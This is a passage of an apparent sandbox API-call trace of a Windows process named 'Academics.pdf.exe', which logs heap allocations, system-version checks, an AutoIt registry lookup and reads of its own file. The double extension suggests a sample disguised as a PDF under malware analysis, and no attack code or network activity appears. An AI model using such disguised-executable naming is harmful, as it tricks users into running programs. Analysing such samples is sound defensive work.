b3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xcf\xd5\xd1\x6a\x9c\xfe\x8b", lpUsedDefaultChar=0x0) returned 256 [0132.263] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41f20e) returned 0x0 [0132.263] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x25c1c28 [0132.264] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c1c68 [0132.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c1c80 [0132.264] GetVersionExW (in: lpVersionInformation=0x8bfd8c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x2f2e2d2c, dwMinorVersion=0x25c2ae0, dwBuildNumber=0x37363534, dwPlatformId=0x15, szCSDVersion="㴼㼾\x08") | out: lpVersionInformation=0x8bfd8c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0132.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25c1c68 | out: hHeap=0x25c0000) returned 1 [0132.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25c1c90 [0132.264] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0132.264] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0132.264] GetCurrentProcess () returned 0xffffffff [0132.264] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x8bfee4 | out: Wow64Process=0x8bfee4) returned 1 [0132.264] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0132.264] GetProcAddress (hModule=0x76c20000, lpProcName="GetNativeSystemInfo") returned 0x76c410b5 [0132.264] GetNativeSystemInfo (in: lpSystemInfo=0x8bfea8 | out: lpSystemInfo=0x8bfea8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0132.264] FreeLibrary (hLibModule=0x76c20000) returned 1 [0132.264] FreeLibrary (hLibModule=0x76c20000) returned 1 [0132.264] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x25c1cb8 [0132.265] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c1c68 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2ae0 [0132.265] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2af0 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2b08 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2b18 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2b30 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2b40 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2b58 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2b68 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2b80 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2b90 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2ba8 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2bb8 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2bd0 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2be0 [0132.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2bf8 [0132.265] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0132.265] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0132.266] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0132.266] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0132.266] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0132.266] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2c08 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2c20 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2c30 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2c48 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2c58 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2c70 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2c80 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2c98 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2ca8 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2cc0 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2cd0 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2ce8 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2cf8 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25c2d10 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25c2d20 [0132.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd5a0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cd5b0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd5e0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdde0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd5f0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cddf8 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd600 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde10 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd610 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd620 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde28 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd630 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde40 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd640 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde58 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd650 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde70 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd660 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cde88 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd670 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdea0 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd680 [0132.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd690 [0132.267] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc13d [0132.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdeb8 [0132.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6a0 [0132.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x25ce1c8 [0132.268] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0132.268] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cded0 [0132.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6b0 [0132.268] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x8bfeb0 | out: phkResult=0x8bfeb0*=0xdc) returned 0x0 [0132.269] RegQueryValueExW (in: hKey=0xdc, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x8bfed0, lpcbData=0x8bfeb4*=0x8 | out: lpType=0x0, lpData=0x8bfed0*=0x30, lpcbData=0x8bfeb4*=0x4) returned 0x0 [0132.269] RegCloseKey (hKey=0xdc) returned 0x0 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdee8 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6c0 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6d0 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6e0 [0132.269] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf00 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd6f0 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x25ce210 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd700 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf18 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd710 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf30 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd720 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf48 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd730 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf60 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd740 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf78 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd750 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdf90 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd760 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdfa8 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd770 [0132.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdfc0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd780 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdfd8 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd790 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25cdff0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7a0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce008 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7b0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce020 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7c0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce038 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7d0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce050 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7e0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce068 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd7f0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce080 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd800 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce098 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd810 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0b0 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd820 [0132.270] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.270] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x400) returned 0x25ce238 [0132.270] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8bf8c8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x37 [0132.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20a) returned 0x25ce640 [0132.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0c8 [0132.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd830 [0132.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x8bf898 | out: phkResult=0x8bf898*=0x0) returned 0x2 [0132.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25ce0c8 | out: hHeap=0x25c0000) returned 1 [0132.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd830 | out: hHeap=0x25c0000) returned 1 [0132.271] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.271] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.271] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0132.271] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x745d0000 [0132.614] GetProcAddress (hModule=0x745d0000, lpProcName="IsThemeActive") returned 0x745f6f36 [0132.614] IsThemeActive () returned 0x1 [0132.616] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x8bfeb0, fWinIni=0x0 | out: pvParam=0x8bfeb0) returned 1 [0132.619] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 0 [0132.619] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8bfc90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0132.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x25ce0c8 [0132.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x25cd830 [0132.619] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a7f6c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x37 [0132.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x25cd840 [0132.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x25cd840, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0132.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x25cd840 | out: hHeap=0x25c0000) returned 1 [0132.619] GetLastError () returned 0x0 [0132.619] SetLastError (dwErrCode=0x0) [0132.619] GetLastError () returned 0x0 [0132.619] SetLastError (dwErrCode=0x0) [0132.619] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.620] GetLastError () returned 0x0 [0132.620] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.621] SetLastError (dwErrCode=0x0) [0132.621] GetLastError () returned 0x0 [0132.622] SetLastError (dwErrCode=0x0) [0132.622] GetLastError () returned 0x0 [0132.622] SetLastError (dwErrCode=0x0) [0132.622] GetLastError () returned 0x0 [0132.622] SetLastError (dwErrCode=0x0) [0132.622] GetLastError () returned 0x0 [0132.622] SetLastError (dwErrCode=0x0) [0132.622] GetLastError () returned 0x0 [0132.622] SetLastError (dwErrCode=0x0) [0132.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x25ce858 [0132.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x25ce878 [0132.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8bf6e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0132.623] GetFileType (hFile=0xec) returned 0x1 [0132.624] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.624] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0132.624] SetFilePointer (in: hFile=0xec, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0132.624] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.624] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0132.624] SetFilePointer (in: hFile=0xec, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0132.624] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.625] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0132.625] SetFilePointer (in: hFile=0xec, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0132.625] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.625] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0132.625] SetFilePointer (in: hFile=0xec, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0132.625] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.626] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0132.626] SetFilePointer (in: hFile=0xec, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0132.626] ReadFile (in: hFile=0xec, lpBuffer=0x8af7fc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8af6e8, lpOverlapped=0x0 | out: lpBuffer=0x8af7fc*, lpNumberOfBytesRead=0x8af6e8*=0x10000, lpOverlapped=0x0) returned 1 [0132.626] SetFilePointer (in: hFile=0xec, 